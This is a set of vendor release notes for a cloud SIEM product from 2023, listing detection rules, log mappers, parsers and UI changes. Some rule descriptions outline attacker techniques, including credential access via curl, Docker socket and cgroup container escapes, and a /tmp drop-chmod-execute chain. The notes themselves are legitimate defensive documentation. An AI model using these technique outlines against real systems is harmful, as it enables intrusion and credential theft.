  • [Deleted] ADAUDIT_SERVER
  • [Deleted] ADAUDIT_USER
  • [Deleted] BLUECOAT_PROXY_1
  • [Deleted] BLUECOAT_PROXY_3
  • [Deleted] CYLANCE_AUDIT1
  • [Deleted] CYLANCE_AUDIT2
  • [Deleted] Firepower_Malware_Event_430005
  • [Deleted] IRON_PORT_CISCO
  • [Deleted] IRON_PORT_WSA_NOHD_02
  • [Deleted] LINUX_AUTH
  • [Deleted] LINUX_ROOT_GENERIC
  • [Deleted] LINUX_ROOT_LOGIN
  • [Deleted] LINUX_ROOT_NO_USER
  • [Deleted] LINUX_ROOT_USER
  • [Deleted] PAN_TRAPS_MISC
  • [Deleted] SYMANTEC_SEP_CF
  • [Deleted] SYMANTEC_SEP_MEMS
  • [Deleted] SYMANTEC_SEP_PRF_04
  • [Deleted] SYMANTEC_SEP_SDN_02
  • [Deleted] SYMANTEC_SEP_SRF_2
  • [Deleted] SYMANTEC_SEP_VF_01
  • [Deleted] TANIUM_S05_TYPE_LOGS
  • [Deleted] VDM_LOG_SECURE
  • [Deleted] citrix_xenserver_auth_message

July 21, 2023 - Application Update

Minor Changes and Enhancements

  • [Update] The Cloud SIEM UI has been updated with refreshed fonts and colors to better align with the core Sumo Logic pages. This is the first change in a greater series of updates designed to present a more unified user experience across Sumo Logic feature sets.
  • [New] The Signal Severity Total, an indication of the activity for an Entity, has been added to the Entity list and details views. The Signal Severity Total is calculated by adding up the severity value for each of the Signals generated against a given Entity during the current detection window (by default 14 days), not including duplicate or suppressed Signals.

Bug Fixes

  • With the recent changes to log mapping, some users were seeing an error when attempting to use custom input vendors and/or products.
  • Entity lookup normalization was taking place after Entity Groups were processed; normalization now happens first.

July 14, 2023 - Content Release

Starting with this release, the rule type for First Seen rules is now "Anomaly", and Outlier Rules have been promoted from prototype mode.

NOTE: Due to performance and efficacy findings, OUTLIER-S00012 will be deleted on July 28th. If you wish to retain this rule, it must be duplicated in the Cloud SIEM Rules UI.

Rules

  • [Updated] OUTLIER-S00001 Spike in login failures from a user
    • Removed incorrect match list from expression.
    • Will remain in prototype an additional week due to changes made to the rule expression.
  • [Updated] OUTLIER-S00002 Spike in Successful Distinct Share Access
  • [Updated] OUTLIER-S00003 Spike in Failed Share Access by User
  • [Updated] OUTLIER-S00004 Spike in Azure Firewall Deny Events from Source IP
  • [Updated] OUTLIER-S00005 Spike in AWS API Call from User
  • [Updated] OUTLIER-S00006 Spike in Data Transferred Outbound by User
  • [Updated] OUTLIER-S00007 Spike in Windows Administrative Privileges Granted for User
  • [Updated] OUTLIER-S00008 Spike in Failed Azure Sign In Attempts Due to Bad Password from IP Address
  • [Updated] OUTLIER-S00009 Spike in PowerShell Command Line Length From Host
  • [Updated] OUTLIER-S00010 Spike in URL Length from IP Address
  • [Updated] OUTLIER-S00011 Spike in AWS AccessDenied Events by assumedrole

Schema

  • [New] http_referer_queryParameters
    • New queryParameters enrichment/mappable field
  • [New] http_url_queryParameters
    • New queryParameters enrichment/mappable field
  • [New] objectClassification
    • Allows objectClassification to be used in Cloud SIEM rule expressions.

July 13, 2023 - Application Update

New RBAC Capabilities

Reminder: Earlier this week, we introduced new RBAC capabilities for Cloud SIEM: View Entities and Manage Entities. Users with the built-in administrator role received these capabilities automatically, but admins must manually add these capabilities to other roles as appropriate. If a user does not have either role, they will not be able to see Entity details or interact with or manage Entities in any way.

Minor Changes and Enhancements

  • [Update] The Entity Timeline feature is now available for all Entity types, including custom types.
  • [New] When viewing an Entity's detail page, both Entity Groups that apply to that Entity and membership in a suppression list will now be listed.

Bug Fixes

  • Some customers were seeing non-blocking errors loading Insight detail pages, and links to Cloud SOAR, when they should not have.
  • The number of records ingested into Cloud SIEM was not being reported consistently on the HUD.

July 11, 2023 - Content Release

This content release includes parsing and mapping updates to Fortinet to account for variations in URL information present in the log sometimes leading to malformed URLs being normalized, adjustments to Jamf mappings to account for case variations in certain fields, as well as changes enumerated below.

Rules

  • [Updated] OUTLIER-S00010 Spike in URL Length from IP Address
    • Narrowed rule expression to NetworkHTTP and NetworkProxy records

Log Mappers

  • [Updated] Fortinet App Control Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet Event Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet Virus Logs
  • [Updated] Fortinet Webfilter Logs
  • [Updated] Jamf Audit User - Audit
  • [Updated] Jamf Audit User - Authentication
  • [Updated] Jamf Audit User - Endpoint
  • [Updated] Jamf Audit User - Network
  • [Updated] SentinelOne Logs - C2C threats
    • Adds alternate value for normalizedSeverity lookup

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Meraki
    • Support for more variation in content filtering block logs and additional drops for events of limited to no security value.

June 29, 2023 - Content Release

This release includes parsing and mapping updates to Fortinet to account for variations in URL information present in the log sometimes leading to malformed URLs being normalized, adjustments to Jamf mappings to account for case variations in certain fields, as well as changes enumerated below.

Rules

  • [Updated] OUTLIER-S00010 Spike in URL Length from IP Address
    • Narrowed rule expression to NetworkHTTP and NetworkProxy records

Log Mappers

  • [Updated] Fortinet App Control Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet Event Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet Virus Logs
  • [Updated] Fortinet Webfilter Logs
  • [Updated] Jamf Audit User - Audit
  • [Updated] Jamf Audit User - Authentication
  • [Updated] Jamf Audit User - Endpoint
  • [Updated] Jamf Audit User - Network
  • [Updated] SentinelOne Logs - C2C threats
    • Adds alternate value for normalizedSeverity lookup

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Meraki
    • Support for more variation in content filtering block logs and additional drops for events of limited to no security value.
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog

June 29, 2023 - Application Update

New RBAC Capabilities

Starting Thursday, July 6, we're introducing new RBAC capabilities for Cloud SIEM: View Entities and Manage Entities. Users with the built-in administrator role will receive these capabilities automatically, but admins must manually add these capabilities to other roles as appropriate. If a user does not have either role, they will not be able to see Entity details or interact with/manage Entities in any way.

Minor Changes and Enhancements

  • [New] Nodes can now be moved around individually on the Insight Related Entities Graph.
  • [Update] To align more closely with accepted industry definitions, we are changing the Dwell Time label on Insight metrics in the UI to Detection Time. Note that only the label is changing, not now the metric is calculated (i.e., the period of time between when the first record in an Insight was observed and when the Insight was created).
  • [Update] Match list update containing more than 1000 entries are now supported by our Terraform provider.
  • [Update] When a custom product or vendor is selected in log mapping, the string entered by the user is now indexed instead of the word "Custom", so that the custom entry can be searchable/filterable. This only applies to mappings configured going forward.
  • [New] Custom tag schemas can now be retrieved via API (GET /tag-schemas).
  • [New] When viewing Rule Tuning Expressions, if one applies to all rules, it will now say All instead of giving a numerical count.
  • [Update] The Cloud SIEM UI color palette has been updated to more closely align with the standard Sumo Logic "dark mode" color palette.

Bug Fixes

  • Insight sub-resolutions were not being passed to XSOAR correctly in some circumstances.
  • Some users were unable to override fields on some Sumo-provided rules.
  • When extracting fields in rule expressions, double quotes were not working ({{fields["<field_name>"]}}).

June 22, 2023 - Content Release

This release includes additional parser and mappers for Aruba ClearPass Syslog events, minor bug fixes to several First Seen type rules, and other specifically enumerated changes below.

Rules

  • [Updated] MATCH-S00814 Abnormal Child Process - sdiagnhost.exe - CVE-2022-30190
    • Adds requirement that commandLine is present for a match
  • [Updated] FIRST-S00016 First Seen Non-Network Logon from User
  • [Updated] FIRST-S00008 First Seen whoami command From User
  • [Updated] MATCH-S00815 Threat Intel - Successful Authentication from Threat IP
    • Adds dstDevice_ip to entity selection

Log Mappers

  • [New] Aruba ClearPass Guest Access
  • [New] Aruba ClearPass WiFi Access Tracker
  • [New] Aruba ClearPass Wifi Failed Tracker
  • [Updated] Aruba ClearPass Syslog
  • [Updated] Tenable.io Authentication
    • Adds alternative key matches for vuln_cve and description fields

Parsers

  • [Updated] /Parsers/System/HP/Aruba ClearPass - Syslog

June 20, 2023 - Application Update

Outlier Rules

Sumo Logic is pleased to announce a new rule type for Cloud SIEM: Outlier Rules. This new rule type further enhances Cloud SIEM’s User and Entity Behavioral Analytics (UEBA) capabilities. With these rules, Cloud SIEM can detect events that deviate from the usual behavior of an Entity, such as a spike in login failures from a user, without having to define a static threshold. Once the rule is set, Cloud SIEM automatically builds a normal behavior baseline for each Entity based on the rule expression. It creates a signal only when a deviation from normal behavior is detected (in this case, too many login failures compared to their normal baseline behavior). Other examples include detecting a spike in Windows administrative privileges granted and a spike in AWS calls from a user.

Outlier Rules are defined like any other rule type through the Content menu in Cloud SIEM.

Example Signal from Outlier Rule

Outlier Rules operate based on a baseline. During this period - typically between 7 and 30 days - the system will learn what normal behavior looks like. After the baseline is established, Cloud SIEM will begin generating Signals when unusual behavior is detected compared to that baseline. (Note that the longer the baseline, the more accurate the model will be.)

Cloud SIEM will include a set of Outlier Rules out of the box. These rules can be tuned and customized like any other rule type, and custom Outlier Rules can also be created.

For more information about how to use Outlier Rules, see the online documentation. You can also see an introduction to the feature by navigating to the Rules page in Cloud SIEM.

Minor Changes and Enhancements

  • [New] Users can now customize the global Signal Suppression period. During this period, which is set to 72 hours by default, duplicate signals (with identical names and Entities) are suppressed (for example, they do not “count” towards Insights). With this new feature, this period can be lowered globally (for all rules) to as low as 24 hours. (Note that lowering this value can lead to a higher number of potentially duplicate Insights.) The setting is accessible via the Workflow > Detection option in the Configuration menu.
  • [Updated] Cloud SIEM application status will now be published on the main Sumo Logic status page, https://status.sumologic.com/. (Previously it was published on https://cse-status.sumologic.com/.) Existing email subscriptions and status notifications will be moved to the new page automatically.

June 12, 2023 - Application Update

Minor Changes and Enhancements

  • [New] The Entity Timeline now supports all Entity types (including custom types).
  • [New] The GetSignals API call now includes an attribute with a timestamp when each Signal was created.
  • [Updated] The log mapping UI has been updated so that if a standard vendor and product is selected, those values will be auto-filled on the record configuration, avoiding an issue where customers were accidentally creating 'custom' values.

Bug Fixes

  • An error would occur when sorting entity groups by entity type.
  • The control used to select schema tags for Entities was not working properly.
  • The "View in Log Search / Normalized Data" button was opening a log search window with an incorrect time frame.
  • Global search was not displaying previous searches, and was not returning some Entities.
  • The rule tuning expression editor would not scroll for very long expressions.
  • Importing a rule via the UI was not working in some scenarios.

June 2, 2023 - Content Release

Within this release, we made modifications to the Threat Intel MATCH-S00815 Rule to include the user_username associated with the 'src_Device_ip' to capture the account the threat IP authenticated with and to correlate on actions by the account. We also made a modification to the Azure Sign in Log mapper so that 'properties.userAgent' is mapped to the entity field 'http_userAgent'.

Rules

  • [Updated] MATCH-S00815 Threat Intel - Successful Authentication from Threat IP

Log Mappers

  • [Updated] AzureActivityLog 01

May 26, 2023 - Content Release

This release changes Crowdstrike mapper record types from 'Endpoint' to 'Audit' logs to align with Crowdstrike documentation, fixes to Fortinet severity scoring, SentinelOne IP mappings, additional values for Windows mappers for Snare, Snare parser updates for Windows Event 4947, updates to TrendMicro Deep Security CEF parser to allow for additional timestamp formats, and a minor rule update.

Rules

  • [Updated] AGGREGATION-S00005 Suspicious System Enumeration Occurring in Quick Succession, Rule no longer in prototype

Log Mappers

  • [Updated] CrowdStrike Audit Logs
  • [Updated] CrowdStrike Falcon Host API DetectionSummaryEvent
  • [Updated] CrowdStrike Falcon Host API IdpDetectionSummaryEvent (CNC)
  • [Updated] CrowdStrike Falcon Identity Protection (CNC)
  • [Updated] CrowdStrike Remote Response Session (CNC)
  • [Updated] CrowdStrike UserActivity Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] SentinelOne Logs - C2C agents
  • [Updated] SentinelOne Logs - C2C threats
  • [Updated] Windows - Security - 4947
  • [Updated] Windows - Security - 4948

Parsers

  • [Updated] /Parsers/System/Trend Micro/Trend Micro Deep Security - CEF
  • [Updated] /Parsers/System/Microsoft/Shared/Windows Text Transforms - Security

May 12, 2023 - Content Release

Across the latest content release, the Threat Labs team has made a series of new AWS specific detections and a set of improvements both to the mappers and parser to include proper inbound / outbound network connection directional flow, and port assignments for AWS GuardDuty. Additional context and minor corrections/improvements can found within the list below.

Rules

  • [New] MATCH-S00874 AWS Lambda Function Recon
  • [New] MATCH-S00875 AWS VPC FLow Log Deletion
  • [New] MATCH-S00876 Potential AWS Security Credential Access via curl
  • [Updated] MATCH-S00226 Azure - Add Member to Group, TLAB-542 Update Azure Group Add rule and mapper addition, Keys updated: summary_expression, normalized_summary

Log Mappers

  • [Updated] AWS GuardDuty Alerts from Sumo CIP
  • [Updated] AWSGuardDuty_Backdoor
  • [Updated] AWSGuardDuty_Behavior
  • [Updated] AWSGuardDuty_Catch_All
  • [Updated] AWSGuardDuty_CryptoCurrency
  • [Updated] AWSGuardDuty_Discovery
  • [Updated] AWSGuardDuty_Exfiltration
  • [Updated] AWSGuardDuty_PenTest
  • [Updated] AWSGuardDuty_Trojan
  • [Updated] AzureActivityLog AuditLogs
  • [Updated] Recon_EC2_PortProbeUnprotectedPort
  • [Updated] Recon_EC2_Portscan
  • [Updated] Recon_IAMUser
  • [Updated] UnauthorizedAccess_EC2_SSHBruteForce
  • [Updated] UnauthorizedAccess_EC2_TorClient
  • [Updated] UnauthorizedAccess_EC2_TorIPCaller
  • [Updated] UnauthorizedAccess_EC2_TorRelay
  • [Updated] UnauthorizedAccess_IAMUser

Parsers

  • [Updated] /Parsers/System/AWS/AWS S3 Server Access Logs, AWS S3 Server Access Logs Parser Fix Related to New Fields and Wrapper
  • [Updated] /Parsers/System/Cisco/Cisco ASA, Modifies ASA header parser to account for additional delimiter variant
  • [Updated] /Parsers/System/AWS/GuardDuty

May 5, 2023 - Content Release

hide_table_of_contents: true image: https://help.sumologic.com/img/sumo-square.png authors:


The latest iteration of our content release include Office 365 changes that address Mapping, Parsing and Rule changes that better take into account fields that were previously encapsulated within the Parameters field. Additionally, we performed improvements to the Zscaler Nanolog mapping and parsing to more accurately present port data even when extracted from URLs.

Rules

  • [Updated] MATCH-S00830 Office 365 Forwarding Rule Created
  • [Updated] MATCH-S00831 Office 365 Unified Audit Logging Disabled

Log Mappers

  • [Updated] Microsoft Office 365 Exchange Mailbox Audit Events: Keys updated: 'targetUser_username'
  • [Updated] Office 365 - Exchange Admin Events: Keys updated: 'user_username', 'targetUser_username'
  • [Updated] Zscaler - Nanolog Streaming Service - JSON: Keys updated: 'dstPort'

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog: REGEX modifications to parse the Firepower Event ID
  • [Updated] /Parsers/System/Microsoft/Office 365
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-CEF
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-JSON
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-LEEF

May 3, 2023 - Application Update

Cloud SIEM Insight Trainer

We are excited to announce the release of Cloud SIEM Insight Trainer, a dashboard packaged with the Cloud SIEM Application.

Many security teams spend time every week tuning their SIEM to improve detections and focus SOC analyst attention on the most serious threats. Insight Trainer utilizes machine learning to provide Rule tuning recommendations and severity adjustments to significantly reduce the burden of manual tuning. Insight Trainer learns Rule severity adjustments from your Insights' history that reduces false positive, and optionally, "No Action" Insights.

Cloud SIEM Insight Trainer

Some of the highlights of Insight Trainer include:

  • Customer-Specific Tuning Recommendations - Insight Trainer makes recommendations specific to each customer based on their unique set of Rules, Insight history, and analyst Insight resolutions.
  • Improved SOC Efficiency - Insight Trainer automates the manual process of identifying Rules that are candidates for tuning or severity adjustment and provides impact analysis of the changes.
  • Machine Learning/AI-Driven Analytics - Insight Trainer leverages machine learning and AI to deliver outcome-based recommendations geared towards the reduction of false positive and non-actionable Insights without compromising the actual detection value or true positive Insights in Cloud SIEM.
  • Easy Adoption - The dashboard is available as an update to our already existing Enterprise Audit Cloud SIEM application and can be set up to run with no additional configuration or data science knowledge.

Periodic application of the recommended changes will improve the quality of Insights generated by Cloud SIEM. For more information about the Insight Trainer, see our detailed online documentation.

Bug Fixes

  • On the Insight Related Entities list, some of the Signal counts were incorrect.
  • Whitespace, including new lines, were being stripped from some Enrichments formatted in JSON.
  • Indicators not using the proper case were being accepted but displaying as "NotFlagged" in the UI.

April 28, 2023 - Content Release

Rules

Updates several Azure based rules to account for modifications made to normalization mappers.

  • [New] MATCH-S00873 AWS EKS Cluster Configuration Updated: AWS EKS clusters contain various configuration options, including for which IP addresses can access the cluster API. Ensure that this change is authorized and expected.
  • [New] MATCH-S00872 AWS EKS Failed Curl Authentication Attempt: Failed instances of curl usage within a containerized environment should occur rarely. Investigate the source IP address used to ensure that it is legitimate.
  • [New] MATCH-S00871 AWS EKS Pod Shared Object Modification or Creation: A Kubernetes pod was either created, updated or patched with a shared process namespace.
  • [New] MATCH-S00870 AWS EKS Secrets Created: Kubernetes secrets may be created for legitimate purposes. Ensure that the secret created is from an IAM account that is expected to manage Kubernetes workloads on EKS.
  • [New] MATCH-S00869 AWS EKS Secrets Deleted: Kubernetes secrets may be deleted for legitimate purposes. Ensure that the secret created is from an IAM account that is expected to manage Kubernetes workloads on EKS.
  • [New] FIRST-S00036 First Seen AWS EKS API Call via CloudTrail from User: The user user_username has performed an operation on an EKS cluster for the first time since the baseline period.
  • [New] FIRST-S00037 First Seen AWS EKS Admission Controller Created by IP Address: First Seen Admission Controllers (submit a new MutatingWebhookConfiguration or ValidatingWebhookConfiguration object via the Kubernetes API, or update an existing one.)
  • [New] FIRST-S00035 First Seen AWS EKS Secrets Enumeration from IP Address: srcDevice_ip has enumerated secrets on an AWS EKS cluster for the first time since the baseline period.
  • [New] FIRST-S00034 First Seen Session Token Granted to User from New IP: An AWS Session token was issued for the first time since the baseline period to user_username using the IP address of srcDevice_ip.
  • [New] FIRST-S00033 First Seen Terminal-Attached Pod Deployed to EKS: A pod was deployed with an attached terminal (stdin=true,stdout=true,tty=true) for the first time since the baseline period.
  • [New] THRESHOLD-S00114 HTTP Response Error Spike to AWS EKS: HTTP web services provide response codes to client requests. The response code numbers in the 400s are used to indicate a client related error and response code numbers in the 500s represent server related errors. This rule looks for a AWS EKS cluster receiving a large frequency of web errors within a short period of time. It is unusual for a web client to cause this many errors in a short period of time. Common occurrences for this behavior is scanning/probing activity or scripted web clients which are now encountering errors due to a misconfiguration or recent change. This rule alerts when a host on the monitored network triggers the threshold.
  • [New] MATCH-S00868 New Binding Role Created on AWS EKS: A role binding grants a resource superuser or administrative access to a Kubernetes cluster. Ensure this action is expected and performed by known Kubernetes administrators.
  • [New] MATCH-S00867 New Cluster Admin Binding Role Created on AWS EKS: A cluster-admin role binding grants a resource superuser or administrative access to a Kubernetes cluster. Ensure this action is expected and performed by known Kubernetes administrators.
  • [New] MATCH-S00866 Privileged Pod Created on AWS EKS: Privileged containers have all capabilities of the host machine. These privileged containers may perform actions directly on the host that they are running on. Ensure that this event is expected and occurs from a user account or IP address that normally works with privileged containers within the cluster. Customers are encouraged to set up an exclusion list for spec.securitycontext.capabilities for pods that are frequently going to be managed with privileged escalation.
  • [Updated] MATCH-S00864 Azure Firewall Rule Modified
  • [Updated] MATCH-S00839 Azure Virtual Machine RunCommand Issued
  • [Updated] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [Updated] FIRST-S00032 First Seen Kubectl Command From User: Expanded record types considered to include Endpoint.
  • [Updated] CHAIN-S00012 Potential Azure Persistence via Automation Accounts
  • [Updated] MATCH-S00167 Recon Using Common Windows Commands: Narrowed rule criteria to Windows executables to prevent erroneous matches from *nix based systems

Log Mappers

  • [New] Administrator Audit Trail: Modified CyberArk EPM mappers to include alternate field values.
  • [New] Administrator Logon
  • [New] Darktrace Parser - Anomalous Connection: Modifies Darktrace mappers to include alternate field values and supports additional events.
  • [New] Darktrace Parser - Brute Force Attempt
  • [New] DocuSign Monitor - Alert
  • [New] DocuSign Monitor - Catch All: Adds support for DocuSign Monitor events via C2C.
  • [New] Druva inSync - Catch All: Adds support for Druva events via C2C.
  • [New] Jamf Audit User - Authentication
  • [New] Jamf Audit User - Endpoint
  • [New] Jamf Audit User - Network
  • [New] Workday - Sign On: Expands mapping support for Workday logs ingested via C2C.
  • [Updated] Azure Administrative logs
  • [Updated] Cisco Meraki IDS Alert - C2C: Corrects typo in mapper for some IP/port fields
  • [Updated] Darktrace Parser - Catch All:
  • [Updated] Darktrace Parser - New Device
  • [Updated] Darktrace Parser Events
  • [Updated] Jamf Audit User - Audit
  • [Updated] Sysdig Benchmark JSON: Corrects bug in severity mapping for Sysdig mappers.
  • [Updated] Sysdig Policy Detection JSON: Corrects bug in severity mapping for Sysdig mappers.
  • [Updated] Sysdig Scanning JSON: Corrects bug in severity mapping for Sysdig mappers.
  • [Updated] Workday - Catch All: Expands mapping support for Workday logs ingested via C2C.
  • [Updated] Zscaler - Nanolog Streaming Service - JSON: Corrects NSS record type to NetworkProxy instead of NetworkFlow

Parsers

Adds support for DocuSign Monitor and Druva inSync Cloud, and additional support for Meraki, CyberArk, and Workday events.

  • [New] /Parsers/System/DocuSign/DocuSign Monitor
  • [New] /Parsers/System/Druva/Druva inSync Cloud
  • [Updated] /Parsers/System/Cisco/Cisco Meraki: Strip off extraneous … from URLs
  • [Updated] /Parsers/System/Cyber-Ark/CyberArk EPM JSON: Corrected time parsing
  • [Updated] /Parsers/System/Darktrace/Darktrace JSON
  • [Updated] /Parsers/System/Duo Security/Duo Multi-Factor Authentication: Duo Parser Fix for Setting Event ID Correctly
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CEF: Adds support for Network events ingested via a log forwarder or Cortex Data Lake.
  • [Updated] /Parsers/System/Workday/Workday

April 21, 2023 - Application Update

Automation Service

Sumo Logic is excited to announce a new feature that integrates functionality previously available only in our Cloud SOAR solution directly into Cloud SIEM. This new feature, the Automation Service, allows you to define and automate smart actions, including enrichments and notifications, enabling your security analysts to address potential security threats faster and more accurately.

You can interact with the service through automations, which execute playbooks. Playbooks are composed of one or more actions with a workflow that can include parallel actions and logic steps. Actions are defined as part of integrations.

The Automation Service includes over 350 integrations out of the box, each including several predefined actions:

Automation Service Integrations

Many playbooks are also included, providing instant value with practically no effort - simply connect the integration to the appropriate endpoint and enable the corresponding automation in Cloud SIEM. Playbooks can be automatically triggered when Insights are created or closed, or triggered manually.

Automation Service Playbook Example

You can also customize these objects or create entirely new ones. While the out of the box actions primarily execute directly from the Sumo Logic cloud, custom actions run through a proxy called a Bridge which runs on a system managed by you.

Automations (and other objects) are accessible through the Configuration menu, under Integrations:

Automation Service Menu

Automation results are accessible from Insight and Entity detail pages.

The Insight Enrichment Server and the Actions functionality in Cloud SIEM, which is replaced by the Automation Service, will be deprecated on November 30, 2023. Until then, they will continue to be fully supported and operational. To aid in migration, all current Enrichment Server examples and Actions have equivalent actions and playbooks in the Automation Service. In addition, through the Bridge, customers can execute any existing Powershell script currently connected to the Insight Enrichment Server.

note

The Automation Service currently has Limited Availability. This means that it is fully functional and supported in production environments, but not automatically deployed to every customer. If you would like it deployed to your environment, please contact Sumo Logic and we will enable it for you.

There is much more information about the Automation Service and how to use it in the online documentation.

Threat Indicators

The way enrichments are displayed in Cloud SIEM is also being enhanced to provide important information to security analysts when they need it, without having to look it up.

First, the Enrichment tabs have been reorganized by Entity (instead of by Enrichment) and additional filter controls have been added:

Enrichments Tab

In addition, Entity enrichments will now persist outside of Insights. So, for example, if an Entity is enriched as part of an Insight, those enrichment details will be visible from that Entity’s details page.

This persistence can be controlled by setting an expiration date as part of the enrichment. In addition, URLs can be attached to enrichments (so that users can click on the link to see more detailed information about the enrichment by, for example, going to the VirusTotal web page for that indicator).

Finally, enrichments can now set reputation indicators. These indicators will be visible anywhere in the UI that the Entity is displayed. Where there is sufficient room, a color-coded text label will be displayed (as in the example above); in other situations, an icon will be displayed instead.

The reputation is not set automatically; the enrichment must pass a reputation to Cloud SIEM. More information about this, and the other new features, is available in online documentation.

Minor Changes and Enhancements

  • [Updated] The Entity Relationship Graph view on Insights has exited open Beta and is now fully supported.
  • [New] When using custom columns with Match Lists, CIDR block matches are now supported with IP address-related fields.
  • [New] When referring to Match Lists, specific columns can now be specified in rule conditions for all Match List types. (Previously this functionality was only available for Threat Intelligence lists.)

April 20, 2023 - Content Release

Summary

Within our latest content release we are introducing a new set of rules related to our 5th Threat Research Campaign structured around Docker, Azure, and Linux. We also made Mapper additions to support Cisco Meraki events ingested via C2C, Cyber Ark Mapper improvements, and new Jamf Audit User Event and Jamf Protect Mappers.

Rules

  • [New] MATCH-S00864 Azure Firewall Rule Modified Description: The Azure Firewall may provide egress and ingress controls for a variety of Azure services; unexpected or unplanned firewall modifications should be investigated.
  • [New] AGGREGATION-S00006 Docker Enumeration Detected on Host Description: Threat actors will aim to enumerate various permissions and settings on hosts with Docker installed; this enumeration can potentially lead to exploitation avenues.
  • [New] FIRST-S00031 First Seen IP Address Associated with User for a Successful Azure AD Sign In Event Description: User has successfully signed into an Azure resource with a first seen IP address since the baseline period.
  • [New] FIRST-S00032 First Seen Kubectl Command From User Description: User has issued a Kubectl command which was first seen since the baseline period on hostname.
  • [New] THRESHOLD-S00112 Multiple Azure Firewall Deny Events for IP Description: An Azure firewall has denied a large number of request from an IP address within a short time window.
  • [New] THRESHOLD-S00113 Multiple Azure Firewall Deny Events for URL Description: An Azure firewall has denied a large number of requests to a URL within a short time window.
  • [New] MATCH-S00865 Potential Docker Escape via Command Line Description: This rule looks for whether the raw Docker socket was used for container creation as well as a bind mount of /hostfs which could facilitate a container escape and allow command execution on the Docker host.
  • [New] CHAIN-S00014 Potential Docker container escape via Cgroups. Description: A Docker container running with the privileged flag may be exploited by threat actors, potentially resulting in an escape from the Docker container to the host that it is running on. This can result in various privilege escalation opportunities.
  • [New] CHAIN-S00015 Suspicious Linux Execution Chain Description: This alert looks for a number of search expressions that result in a suspicious Linux execution chain. Specifically, a file that is created in a users' home directory or in /tmp, followed by a chmod and file execution, as well as the process making a network connection.

Log Mappers

  • [New] Cisco Meraki File Scanned - C2C
  • [New] Cisco Meraki IDS Alert - C2C
  • [New] Cisco Meraki Organization Configuration Change - C2C
  • [New] Cisco Meraki Wireless Air Marshall - C2C
  • [New] Jamf Audit User - Events
  • [New] Jamf Protect Analytics - Events
  • [Updated] Cisco Meraki 8021x
  • [Updated] Cisco Meraki Catch All - Custom Parser
  • [Updated] Cisco Meraki Client Association
  • [Updated] Cisco Meraki Content Filtering Block - Custom Parser
  • [Updated] Cisco Meraki Flow Start_End - Custom Parser
  • [Updated] Cisco Meraki Flows - Custom Parser
  • [Updated] Cisco Meraki IDS - Custom Parser
  • [Updated] Cisco Meraki Security Filtering Disposition Change - Custom Parser
  • [Updated] Cisco Meraki Security Filtering File Scanned - Custom Parser
  • [Updated] Cisco Meraki URLS - Custom Parser
  • [Updated] Cisco Meraki WPA - Custom Parser
  • [Updated] Cyber Ark 01
  • [Updated] Cyber Ark EPM AggregateEvent
  • [Updated] Cyber Ark EPM AuditAdmin
  • [Updated] Cyber Ark EPM GetComputer
  • [Updated] Cyber Ark EPM Policy
  • [Updated] Cyber Ark EPM RawDetails
  • [Updated] Cyber Ark EPM RawEvents
  • [Updated] Cyber Ark Vault JSON
  • [Updated] Jamf Parser - Catch All

Parsers

  • [New] /Parsers/System/Cisco/Cisco Meraki C2C
  • [New] /Parsers/System/Sophos/Sophos Central C2C JSON
  • [Updated] /Parsers/System/Jamf/Jamf

April 13, 2023 - Content Release

Summary

  • Updated GuardDuty mappers to use detail.type instead of overly verbose detail.description.
  • Added parsing and mapping support for Citrix Cloud C2C.
  • Secondary update corrections around Matchlist fix for column specifc filters.
  • New Sophos C2C mapper expansion around Event and Alert normalization.
  • Net-new OOBB content for Zoom; eight-Match rules, six Mappers, one Parser.

Rules

  • [New] MATCH-S00856 Zoom - Account Created
  • [New] MATCH-S00857 Zoom - Account Deleted
  • [New] MATCH-S00858 Zoom - Group Admin Added
  • [New] MATCH-S00859 Zoom - Group Admin Deleted
  • [New] MATCH-S00860 Zoom - Group Changes
  • [New] MATCH-S00861 Zoom - Information Barrier Policy Changes
  • [New] MATCH-S00862 Zoom - Meeting Risk Alert
  • [New] MATCH-S00863 Zoom - Recording Modification
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force

Log Mappers

  • [New] Citrix Cloud Client Created or Deleted
  • [New] Sophos - C2C Alerts
  • [New] Sophos - C2C Event Threat Detections
  • [New] Zoom - Account Creations or Deletions
  • [New] Zoom - Catch All
  • [New] Zoom - Group Modifications
  • [New] Zoom - Information Barrier Policy Modifications
  • [New] Zoom - Meeting Risk Alert
  • [New] Zoom - Recording Deleted or Trashed
  • [Updated] AWSGuardDuty_PenTest
  • [Updated] AWSGuardDuty_Stealth
  • [Updated] Recon_EC2_PortProbeUnprotectedPort
  • [Updated] Recon_IAMUser

Parsers

  • [New] /Parsers/System/Citrix/Citrix Cloud C2C
  • [New] /Parsers/System/Zoom/Zoom

April 13, 2023 - Application Update

Minor Changes and Enhancements

  • [New] When logs fail to parse or map, a detailed error message will be logged in the sec_record_failure index, in the fields.reason attribute.
  • [New] Where possible, private domains are now automatically enriched by Cloud SIEM during record processing.
  • [Updated] Insight comments can now contain up to 1024 characters (up from 256).
  • [New] On the list of Rule Tuning Expressions, each Tuning Expression now lists the number of Rules to which it is currently applied.
  • [New] For First Seen Rules, the UI will display the baseline model status (i.e., building, with amount of progress, or complete). (Note it will only display the status on Rules that were created or updated after this feature became available.)

